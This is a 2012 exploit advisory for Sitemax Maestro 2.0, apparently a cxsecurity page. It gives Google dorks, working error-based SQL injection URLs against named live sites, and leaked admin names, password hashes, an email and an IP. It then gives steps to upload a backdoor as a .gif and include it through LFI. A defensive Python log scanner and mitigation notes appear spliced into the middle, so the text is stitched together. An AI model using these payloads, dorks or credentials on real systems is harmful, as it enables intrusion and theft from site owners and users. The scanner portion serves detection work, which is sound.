Bug: Sitemax Maestro 2.0 SQL Injection and LFI

Sitemax Maestro 2.0 SQL Injection and LFI

Published: 2012.09.04
Credit: AkaStep & BOT_25 & HERO_AZE
Risk: Medium
CWE: CWE-89, CWE-98
CVE: N/A
Local: No
Remote: Yes
Dork: site:am pages.php?al= OR site:am swlang.php

========================================
Vulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)
Vendor: http://sitemax.am/
License Type: Commercial
Discovered and exploited in the wild
=========================================
Dork 1:
site:am pages.php?al=

Dork 2:
site:am swlang.php

Dork 3 (footer text):
Designed and developed by SiteMax IT
Sitemax Maestro v. 2.0

=========================================


Error-based blind SQLi:


http://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select
count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- AND 1='1

http://megasport.am/maestro/ <== Admin Panel


Megasport
2012-09-03 05:51
Fatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1
SELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select
count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1




If MySQL is version > 5.1 you can also use this way (funny pow() failure ;)):

http://sXXe.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select
concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1


Demo 2 and new technique:


http://armeXXXrok.am/pages.php?al=contacts1' or (select pow((select hex((select
concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1


2012-09-02 19:59
Fatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select
concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','getosdur@localhost.tld','130.193.121.51') from dual limit
1))),(rand() * 1e100))'
SELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select
concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND
visible='1' LIMIT 1



Local File Inclusion:

After gaining access to the admin panel, upload your backdoor as a backdoor.gif file using site.am/pfs.php

Then include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==

Enjoy your backdoor on the server )
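From the defender's side, both request shapes in this advisory leave clear traces in the web server's access log, and the error pages quoted above show why: the application echoes the failing query together with the row contents (user name and password hash) straight to the client. The following Python is an added example, not code from the original advisory or from Sitemax Maestro. It parses a few constructed combined-format log lines (IPs, timestamps and filenames are made up), flags the error-based SQLi signatures seen above in the al parameter (floor(rand(0)*2) ... group by, pow()/hex(), information_schema, quote break-out with a -- terminator), flags traversal, path separators and %00 truncation in the lang parameter of swlang.php, and shows the allow-list mitigation for lang. The assumption that lang is a two-letter code and the language set en/hy/ru are placeholders, not something the page states.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (illustrative, not from any real server).
# Lines 1-2 mirror the two request shapes described in the advisory; lines 3-4 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Sep/2012:05:51:02 +0400] "GET /pages.php?al=1'%20or%20(select%20floor(rand(0)*2)%20from(select%20count(*),concat((select%20concat(user_name,0x7c,user_password)%20from%20sed_users%20limit%201),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20AND%201='1 HTTP/1.1" 500 812
203.0.113.5 - - [03/Sep/2012:05:52:10 +0400] "GET /swlang.php?lang=../../datas/users/3-shell.gif%00&redirect=L2FkbWluLnBocA== HTTP/1.1" 302 0
198.51.100.7 - - [03/Sep/2012:05:53:00 +0400] "GET /pages.php?al=contacts HTTP/1.1" 200 4210
198.51.100.7 - - [03/Sep/2012:05:53:05 +0400] "GET /swlang.php?lang=en&redirect=L2luZGV4LnBocA== HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signatures of the error-based techniques shown in the advisory, matched on the
# percent-decoded parameter value (the payloads arrive URL-encoded).
SQLI_SIGNATURES = [
    ("error-based duplicate-key (floor(rand(0)*2) ... group by)",
     re.compile(r"floor\s*\(\s*rand\s*\(.*?group\s+by", re.I | re.S)),
    ("error-based pow()/hex() DOUBLE overflow",
     re.compile(r"pow\s*\(.*?hex\s*\(", re.I | re.S)),
    ("information_schema access",
     re.compile(r"information_schema", re.I)),
    ("quote break-out with OR/AND and comment terminator",
     re.compile(r"'\s*(?:or|and)\b.*?--", re.I | re.S)),
]

# Assumption: swlang.php expects a two-letter language code such as "en".
LANG_RE = re.compile(r"[a-z]{2}")
ALLOWED_LANGS = ("en", "hy", "ru")  # assumed site languages; adjust per deployment


def parse_request(line):
    """Return (client_ip, path, {param: decoded value}) for one combined-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    ip = line.split(" ", 1)[0]
    path, _, query = m.group(1).partition("?")
    # parse_qsl percent-decodes, so %00 becomes a real NUL byte, just as the
    # PHP script would receive it in $_GET.
    params = dict(parse_qsl(query, keep_blank_values=True))
    return ip, path, params


def sqli_signatures(value):
    """Names of the SQLi signatures present in a decoded parameter value."""
    return [name for name, rx in SQLI_SIGNATURES if rx.search(value)]


def lang_problems(value):
    """Reasons a lang value must not be used to build a file path (empty list = clean)."""
    problems = []
    if "\x00" in value:
        problems.append("NUL byte (path truncation)")
    if ".." in value:
        problems.append("directory traversal")
    if "/" in value or "\\" in value:
        problems.append("path separator")
    if not LANG_RE.fullmatch(value):
        problems.append("not a two-letter language code")
    return problems


def resolve_lang(value, allowed=ALLOWED_LANGS, default="en"):
    """Allow-list mitigation: user input selects a known language, it never becomes a path."""
    return value if value in allowed else default


def scan_log(text):
    """Return one finding per suspicious parameter: ip, path, param and the reasons."""
    findings = []
    for line in text.splitlines():
        parsed = parse_request(line)
        if not parsed:
            continue
        ip, path, params = parsed
        for name, value in params.items():
            reasons = sqli_signatures(value)
            if name == "lang":
                reasons += lang_problems(value)
            if reasons:
                findings.append({"ip": ip, "path": path, "param": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} param={f['param']}: " + "; ".join(f["reasons"]))
```

Two points worth noting. Matching must run on the decoded value: the pages.php request above shows up with spaces as %20 and the terminator as %00, so a rule written against the raw request line will miss variants trivially. And detection is the second line of defence: the root fixes are a parameterized query for the alias lookup in pages.php, an allow-list such as resolve_lang for the lang parameter instead of any path built from it, and not echoing SQL errors to the client, since the Fatal error text shown in this advisory is what turns a failed query into a credential disclosure.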


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep & BOT_25 & HERO_AZE

Copyright 2014, cxsecurity.com